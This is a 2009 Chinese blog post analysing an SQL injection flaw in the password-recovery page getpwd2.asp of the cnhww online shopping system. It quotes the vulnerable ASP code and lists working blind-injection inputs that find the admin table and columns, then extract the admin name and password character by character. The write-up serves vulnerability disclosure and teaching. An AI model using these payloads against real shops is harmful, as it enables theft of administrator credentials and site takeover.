数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 



网趣网上购物系统SQL注入漏洞浅析
樱木花盗 发表于 2009-10-16 22:21:17

author: cnryan @http://hi.baidu.com/cnryan

   网趣网上购物系统是一套简单易用、功能强大、用户使用最为广泛的网上购物开店平台,凭借多年的网上购物系统研发经验,软件功能日趋强大与完善、依托庞大的用户使用群体,网趣网上购物系统越来越受到用户的青睐,成为众多用户网上开店首选品牌。

这是官方的话 ↑
这个sql injection出现在找回密码处,最新版本的9.4也存在漏洞,随后对v9.0等以下版本测试均存在漏洞。

漏洞页面:getpwd2.asp

漏洞代码:
<%
username=request.form("username")
set rs=Server.CreateObject("Adodb.Recordset")
sql="select * from [user] where username='"&username&"' "
rs.open sql,conn,1,1
If rs.eof Then
%>

典型的注入,和以前的网软购物系统一个模样

http://127.0.0.1/cnhww9.4/getpwd.asp
getpwd.asp是找回密码的页面,输入的用户名交给getpwd2.asp处理,若存在用户名到达第二步,否则退出



输入 test' and 1=1 and ''='
跳到getpwd2.asp 第二步


输入 test' and 1=2 and ''='
提示没有这个用户



    猜表 ->cnhww

test' and exists (select * from [admin]) and '1'='1    F
test' and exists (select * from [cnhww]) and '1'='1    T


   字段 ->admin password
test' and exists (select admin from [cnhww]) and '1'='1      T
test' and exists (select password from [cnhww]) and '1'='1   T

   值 -->
test' and (select top 1 asc(mid(admin,1,1)) from cnhww)>97 and '1'='1   F
test' and (select top 1 asc(mid(admin,1,1)) from cnhww)>96 and '1'='1   T
97=a
test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>100 and '1'='1   F
test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>99 and '1'='1    T
100=d

……


test' and (select top 1 asc(mid(password,1,1)) from cnhww)>55 and '1'='1

……

……


阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.